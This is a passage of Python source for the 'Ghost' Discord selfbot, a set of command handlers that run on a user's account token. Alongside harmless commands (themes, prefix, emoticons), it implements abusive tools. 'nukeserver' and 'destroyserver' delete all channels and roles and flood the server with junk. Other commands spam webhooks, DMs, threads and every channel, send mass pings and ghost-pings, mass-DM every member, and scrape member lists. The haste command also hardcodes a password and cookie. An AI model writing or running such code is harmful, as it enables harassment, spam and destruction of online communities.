@Ghost.command(name="spamwebhook", description="Spam the shit out of a webhook.", usage="spamwebhook [amount] [url] (message)")
async def spamwebhook(ctx, amount: int, url, *, message = None):
if __embedmode__:
embed = discord.Embed(title="Spamming webhook...", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Spamming webhook...", delete_after=__deletetimeout__)
if message is None:
for _ in range(amount):
spamMsg = ''.join(random.choice(string.ascii_letters) for i in range(2000))
webhook = DiscordWebhook(url=url, content=spamMsg)
webhook.execute()
else:
for _ in range(amount):
webhook = DiscordWebhook(url=url, content=message)
webhook.execute()
if __embedmode__:
embed = discord.Embed(title="Finished spamming webhook", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Finished spamming webhook!", delete_after=__deletetimeout__)
@Ghost.command(name="newwebhook", description="Create a webhook in the command channel.", usage="newwebhook [name]", aliases=["createwebhook"])
async def newwebhook(ctx, *, name):
webhook = await ctx.channel.create_webhook(name=name)
if __embedmode__:
embed = discord.Embed(title=f"Created a webhook called {name}", description=f"URL: {webhook.url}", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"Created a webhook called {name}\nURL: {webhook.url}", delete_after=__deletetimeout__)
@Ghost.command(name="delwebhook", description="Delete a webhook from the ID.", usage="delwebhook [id]", aliases=["deletewebhook", "removewebhook"])
async def delwebhook(ctx, id: int):
webhook = await Ghost.fetch_webhook(id)
await webhook.delete()
if __embedmode__:
embed = discord.Embed(title="Deleted the webhook", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Deleted the webhook", delete_after=__deletetimeout__)
@Ghost.command(name="webhookinfo", description="Information about the webhook.", usage="webhookinfo [id]", aliases=["webhooklookup", "lookupwebhook"])
async def webhookinfo(ctx, id: int):
webhook = await Ghost.fetch_webhook(id)
if __embedmode__:
embed = discord.Embed(title=f"{webhook.name} Information", colour=__embedcolour__)
embed.add_field(name="Webhook Name", value=f"```{webhook.name}```", inline=False)
embed.add_field(name="Webhook ID", value=f"```{webhook.id}```", inline=False)
embed.add_field(name="Webhook Guild", value=f"```{webhook.guild.name}```", inline=False)
embed.add_field(name="Webhook Channel", value=f"```{webhook.channel.name}```", inline=False)
embed.add_field(name="Webhook Token", value=f"```{webhook.token}```", inline=False)
embed.set_thumbnail(url=webhook.avatar_url)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ {webhook.name} Information ]
Webhook Name: {webhook.name}
Webhook ID: {webhook.id}
Webhook Guild: {webhook.guild.name}
Webhook Channel: {webhook.channel.name}
Webhook Token: {webhook.token}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="dumpchat", description="Get the chat's history.", usage="dumpchat [amount] (channel id) (oldest first, true/false)", aliases=["savechat", "chathistory"])
async def dumpchat(ctx, amount: int, channelId: int = None, oldestFirst: bool = False):
if channelId is None:
messages = await ctx.channel.history(limit=amount, oldest_first=oldestFirst).flatten()
f = open("chat_history.txt", "a")
try:
f.write(f"Chat history for #{ctx.channel.name} in {ctx.guild.name}\nSaved a total of {len(messages)} messages.\n \n")
except:
f.write(f"Saved a total of {len(messages)} messages.\n \n")
for msg in messages:
try:
f.write(f"[{msg.created_at.strftime('%m/%d/%Y, %H:%M:%S')}] {msg.author.name}#{msg.author.discriminator}: {msg.content}\n")
except:
pass
f.close()
await ctx.send("Generated the chat history.", file=discord.File("chat_history.txt"))
os.remove("chat_history.txt")
else:
channel = Ghost.get_channel(channelId)
messages = await channel.history(limit=amount, oldest_first=oldestFirst).flatten()
f = open("chat_history.txt", "a")
try:
f.write(f"Chat history for #{channel.name} in {channel.guild.name}\nSaved a total of {len(messages)} messages.\n \n")
except:
f.write(f"Saved a total of {len(messages)} messages.\n \n")
for msg in messages:
try:
f.write(f"[{msg.created_at.strftime('%m/%d/%Y, %H:%M:%S')}] {msg.author.name}#{msg.author.discriminator}: {msg.content}\n")
except:
pass
f.close()
await ctx.send("Generated the chat history.", file=discord.File("chat_history.txt"))
os.remove("chat_history.txt")
@Ghost.command(name="newtheme", description="Create a new theme with the given name.", usage="newtheme [name]", aliases=["createtheme"])
async def newtheme(ctx, *, name):
if not os.path.isfile(f'themes/{name}.json'):
name = name.replace(" ", "-")
f = open(f'themes/{name}.json', "w")
f.write("""
{
"embedtitle": "Ghost Recoded",
"embedcolour": "#708ffa",
"embedfooter": "",
"embedfooterimage": "",
"globalemoji": ":ghost:",
"embedimage": ""
}
""")
f.close()
if __embedmode__:
embed = discord.Embed(title="Theme create with the name " + name, colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ Theme create with the name {name} ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
if __embedmode__:
embed = discord.Embed(title="A theme with that name already exists", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ A theme with that name already exists ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="deltheme", description="Delete the named theme.", usage="deltheme [name]", aliases=["deletetheme", "removetheme"])
async def deltheme(ctx, *, name):
if not os.path.isfile(f'themes/{name}.json'):
if __embedmode__:
embed = discord.Embed(title="A theme with that name doesnt exist", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ A theme with that name doesnt exist ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
os.remove(f'themes/{name}.json')
if __embedmode__:
embed = discord.Embed(title="Theme with the name " + name + " was deleted", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ Theme with the name {name} was deleted ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="theme", description="Change your current theme.", usage="theme [theme]", aliases=["settheme"])
async def theme__(ctx, *, theme):
if os.path.isfile(f'themes/{theme}.json'):
updateTheme(theme + ".json")
Config.changeTheme(theme)
if __embedmode__:
embed = discord.Embed(title="That theme has been set", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ That theme has been set ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
if __embedmode__:
embed = discord.Embed(title="A theme with that name doesnt exist", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ A theme with that name doesnt exist ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="prefix", description="Set the command prefix.", usage="prefix [prefix]", aliases=["c"])
async def prefix(ctx, *, prefix):
Config.changePrefix(prefix)
if __embedmode__:
embed = discord.Embed(title=f"Prefix changed to `{prefix}`", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ Prefix changed to {prefix} ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="restart", description="Restart Ghost selfbot.", usage="restart", aliases=["reboot", "reload", "consoleCommand-restart"])
async def restart(ctx):
print_info("Restarting ghost...")
try:
await ctx.send("Restarting ghost...")
except:
pass
restart_bot()
@Ghost.command(name="firstmessage", description="Get the first message in the command channel.", usage="firstmessage", aliases=["firstmsg"])
async def firstmessage(ctx):
messages = await ctx.channel.history(limit=1, oldest_first=True).flatten()
for message in messages:
firstMessage = message
if __embedmode__:
embed = discord.Embed(title="First Message", description=f"{firstMessage.jump_url}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"First message: {firstMessage.jump_url}")
@Ghost.command(name="haste", description="Upload text to Ghost's Haste site.", usage="haste [text]")
async def haste(ctx, *, text):
url = "https://haste.ghost.cool/haste"
payload=f'password=h5MEn3ptby4XSdxJ&text={text}&username={ctx.author.name}'
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': '__cfduid=dffeb66149683e21f8e860ea28116dd7d1613823909'
}
response = requests.request("POST", url, headers=headers, data=payload)
await ctx.send(response.text)
@Ghost.command(name="brainfuck", description="Generate brainfuck code from text.", usage="brainfuck [text]", aliases=["bf"])
async def brainfuck(ctx, *, text):
result = brainfuckery.Brainfuckery().convert(text)
await ctx.send(result)
@Ghost.command(name="executebrainfuck", description="Execute brainfuck code.", usage="executebrainfuck [code]", aliases=["ebf"])
async def executebrainfuck(ctx, *, code):
result = brainfuckery.Brainfuckery().interpret(code)
await ctx.send(result)
@Ghost.command(name="shrug", description="Shrug your arms.", usage="shrug")
async def shrug(ctx):
await ctx.send(f"¯\_(ツ)_/¯")
@Ghost.command(name="tableflip", description="Flip the table.", usage="tableflip")
async def tableflip(ctx):
await ctx.send("(╯°□°)╯︵ ┻━┻")
@Ghost.command(name="unflip", description="Put the table back.", usage="unflip")
async def unflip(ctx):
await ctx.send("┬─┬ ノ( ゜-゜ノ)")
# @Ghost.command(name="hide", description="Hide a message behind another message.", usage="hide [msg1] [msg2]")
# async def hide(ctx, msg1, msg2):
# await ctx.send(msg1+hideText+msg2)
@Ghost.command(name="blank", description="Send a blank message", usage="blank", aliases=["empty"])
async def blank(ctx):
await ctx.send("** **")
@Ghost.command(name="length", description="Get the length of a string.", usage="length [string]", aliases=["stringlength"])
async def length(ctx, *, string):
await ctx.send(f"Length of `{string}`: " + len(string))
@Ghost.command(name="lmgtfy", description="Let me Google that for you.", usage="lmgtfy [search]", aliases=["letmegooglethatforyou"])
async def lmgtfy(ctx, *, search):
await ctx.send(f"https://lmgtfy.app/?q={search.replace(' ', '+')}")
@Ghost.command(name="selfbotcheck", description="Checks for users using a selfbot.", usage="selfbotcheck", aliases=["sbcheck"])
async def selfbotcheck(ctx):
await ctx.send("Checking for users with a trash selfbot...\nPeople who react below are using a selfbot.")
await ctx.send("GIVEAWAY")
await ctx.send("🎉 **GIVEAWAY** 🎉")
@Ghost.command(name="nukeserver", description="Delete all roles and channels in the command server.", usage="nukeserver", aliases=["nukeguild"])
async def nukeserver(ctx):
if __riskmode__:
if ctx.author.guild_permissions.administrator:
for channel in ctx.guild.channels:
try:
await channel.delete()
except:
pass
for role in ctx.guild.roles:
try:
await role.delete()
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="destroyserver", description="Completely destroy the command server.", usage="destroyserver", aliases=["destroyguild"])
async def destroyserver(ctx):
if __riskmode__:
if ctx.author.guild_permissions.administrator:
for channel in ctx.guild.channels:
try:
await channel.delete()
except:
pass
for role in ctx.guild.roles:
try:
await role.delete()
except:
pass
name = ''.join(random.choice(string.ascii_letters) for i in range(100))
await ctx.guild.edit(name=name)
for _ in range(500):
name = ''.join(random.choice(string.ascii_letters) for i in range(random.randint(12, 18)))
await ctx.guild.create_text_channel(name=f'{name}')
await ctx.guild.create_role(name=f'{name}')
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="spamchannels", description="Spam create channels with a desired name. (Thanks Port <3)", usage="spamchannels [amount] (name)", aliases=["spamcreatechannels"])
async def spamchannels(ctx, amount: int, *, name = None):
if __riskmode__:
if ctx.author.guild_permissions.manage_channels:
if name is None:
for _ in range(amount):
name = ''.join(random.choice(string.ascii_letters) for i in range(random.randint(12, 18)))
await ctx.guild.create_text_channel(name=f'{name}')
else:
for _ in range(amount):
await ctx.guild.create_text_channel(name=f'{name}')
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="spamroles", description="Spam create roles with a desired name.", usage="spamroles [amount] (name)", aliases=["spamcreateroles"])
async def spamroles(ctx, amount: int, *, name = None):
if __riskmode__:
if ctx.author.guild_permissions.manage_roles:
if name is None:
for _ in range(amount):
name = ''.join(random.choice(string.ascii_letters) for i in range(random.randint(12, 18)))
await ctx.guild.create_role(name=f'{name}')
else:
for _ in range(amount):
await ctx.guild.create_role(name=f'{name}')
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="deletechannels", description="Delete all of the command server's channels.", usage="deletechannels", aliases=["delchannels", "removechannels"])
async def deletechannels(ctx):
if __riskmode__:
if ctx.author.guild_permissions.manage_channels:
for channel in ctx.guild.channels:
try:
await channel.delete()
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="deleteroles", description="Delete all of the command server's roles.", usage="deleteroles", aliases=["delroles", "removeroles"])
async def deleteroles(ctx):
if __riskmode__:
if ctx.author.guild_permissions.manage_roles:
for role in ctx.guild.roles:
try:
await role.delete()
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="dmspam", description="Spam DM messages X amount of times.", usage="dmspam [amount] [delay] [@user] [message]", aliases=["spamdm"])
async def dmspam(ctx, amount: int, delay: int, user: discord.User, *, message):
if __riskmode__:
for _ in range(amount):
try:
await user.send(message)
await asyncio.sleep(delay)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="threadspam", description="Spam create threads with a starting message.", usage="threadspam [delay] [amount] [addusers | true/false] [name] [startmessage]", aliases=["spamthreads", "spamcreatethreads"])
async def threadspam(ctx, delay: int, amount: int, addusers: bool, name: str = "Ghost best selfbot!", *, startmessage: str):
if __riskmode__:
users = []
try:
await ctx.message.delete()
except:
pass
def createThread(title, channel_id, start_message_id):
return requests.request("post", f"https://discord.com/api/channels/{channel_id}/messages/{start_message_id}/threads", headers={"Authorization": __token__, "Content-Type": "application/json"}, data=json.dumps({"name": title}))
def getUsers(guild, channel):
DiscumClient = discum.Client(token=__token__, user_agent=f"{get_random_user_agent()}")
@DiscumClient.gateway.command
def pingpingbrbr(resp):
guild_id = f'{guild.id}'
channel_id = f'{channel.id}'
if resp.event.ready_supplemental:
DiscumClient.gateway.fetchMembers(guild_id, channel_id, wait=1)
if DiscumClient.gateway.finishedMemberFetching(guild_id):
DiscumClient.gateway.removeCommand(pingpingbrbr)
DiscumClient.gateway.close()
DiscumClient.gateway.run()
members = []
for memberID in DiscumClient.gateway.session.guild(f'{guild.id}').members:
members.append(f"<@!{memberID}>")
return members
async def addUsers(users, channel_id):
try:
requests.post(f"https://discord.com/api/channels/{channel_id}/messages", headers={"Authorization": __token__, "Content-Type": "application/json"}, data=json.dumps({"content": ' '.join(users)}))
except:
pass
if addusers:
print_info("Fetching channel members...")
users = getUsers(ctx.guild, ctx.channel)
await asyncio.sleep(2)
print(users)
await asyncio.sleep(2)
index = 0
if not ctx.author.guild_permissions.administrator:
if amount > 5:
print_info("Limiting amount of threads to 5 to prevent rate limits.")
amount = 5
for _ in range(amount):
index += 1
try:
message = await ctx.send(startmessage + f" {index}")
createThredResponse = createThread(name, ctx.channel.id, message.id)
if addusers:
print_info("Adding users to the thread...")
await addUsers(users, createThredResponse.json()["id"])
print_info("Created a new thread.")
try:
await message.delete()
except:
pass
await asyncio.sleep(delay)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="channelspam", description="Spam a message X amount of times in every channel.", usage="channelspam [amount] [delay] [message]", aliases=["sendall", "sendtoallchannels", "msgallchannels", "messageallchannels"])
async def channelspam(ctx, amount:int, *, message:str):
if __riskmode__:
for _ in range(amount):
for channel in ctx.guild.text_channels:
try:
await channel.send(message)
await asyncio.sleep(1)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="spam", description="Spam X amount of times.", usage="spam [amount] [delay] [message]")
async def spam(ctx, amount: int, delay: int, *, message):
if __riskmode__:
global spammingMessages
spammingMessages = True
async def spamMessages():
for _ in range(amount):
if spammingMessages == True:
await ctx.send(message)
await asyncio.sleep(delay)
else:
return
Ghost.loop.create_task(spamMessages())
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="stopspam", description="Stop spamming messages.", usage="stopspam")
async def stopspam(ctx):
if __riskmode__:
global spammingMessages
spammingMessages = False
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="ttsspam", description="Spam TTS messages X amount of times.", usage="ttsspam [amount] [delay] [message]", aliases=["texttospeachspam"])
async def ttsspam(ctx, amount: int, delay: int, *, message):
if __riskmode__:
for _ in range(amount):
await ctx.send(message, tts=True)
await asyncio.sleep(delay)
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="fetchmembers", description="Fetch members from a server.", usage="fetchmembers", aliases=["fetchmembersfromserver"])
async def fetchmembers(ctx):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
print_info("Fetching members from server...")
guild_id = ctx.guild.id
channel_id = ctx.channel.id
bot.gateway.fetchMembers(guild_id, channel_id, reset=False)
@bot.gateway.command
def memberTest(resp):
if bot.gateway.finishedMemberFetching(guild_id):
lenmembersfetched = len(bot.gateway.session.guild(guild_id).members)
print_info(str(lenmembersfetched)+' members fetched')
print_info("Fetch complete.")
bot.gateway.removeCommand(memberTest)
bot.gateway.close()
bot.gateway.run()
members = bot.gateway.session.guild(guild_id).members
open("data/members.txt", "w").write('\n'.join(members))
await ctx.send("See console.", delete_after=__deletetimeout__)
print_info("Fetched a total of " + str(len(members)) + " members.")
print_info("Saved a list of member IDs to data/members.txt.")
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="massghostping", description="Ping a mass amount of people in the command server and delete the messages.", usage="massghostping (amount of messages) (send delay)", aliases=["massghostmention", "theotherfunny"])
async def massghostping(ctx, amount:int=1, delay:int=0):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=0)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
# members = []
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
messages = []
message = ""
# for channel in ctx.guild.text_channels:
# print_info(f"Starting fetch in #{channel.name}.")
# members2 = get_members(str(ctx.guild.id), str(channel.id))
# for member in members2:
# members.append(member)
# print_info(f"Fetched a total of {len(members)} members.")
for member in members:
if len(message) < 1950:
message += f"<@{member}> "
else:
messages.append(message)
message = ""
messages.append(message)
for _ in range(amount):
for message in messages:
try:
await ctx.send(message, delete_after=0)
await asyncio.sleep(delay)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="massping", description="Ping a mass amount of people in the command server.", usage="massping (amount of messages) (send delay)", aliases=["massmention", "sigmainstaller", "hahafunny"])
async def massping(ctx, amount:int=1, delay:int=0):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=0)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
messages = []
message = ""
for member in members:
if len(message) < 1950:
message += f"<@{member}> "
else:
messages.append(message)
message = ""
messages.append(message)
for _ in range(amount):
for message in messages:
try:
await ctx.send(message)
await asyncio.sleep(delay)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="massdm", description="Send a DM message to everyone in the server.", usage="massdm [delay] [amount] [message]")
@commands.guild_only()
async def massdm(ctx, delay:int=0, amount:int=10, *, message:str):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=1)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
for _ in range(amount):
for member in members:
try:
member = await Ghost.fetch_user(int(member))
await member.send(message)
except:
pass
await asyncio.sleep(delay)
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="rickroll", description="Send never gonna give you up lyrics one by one.", usage="rickroll")
async def rickroll(ctx):
global rickRollEnabled
rickRollEnabled = True
async def sendLyrics():
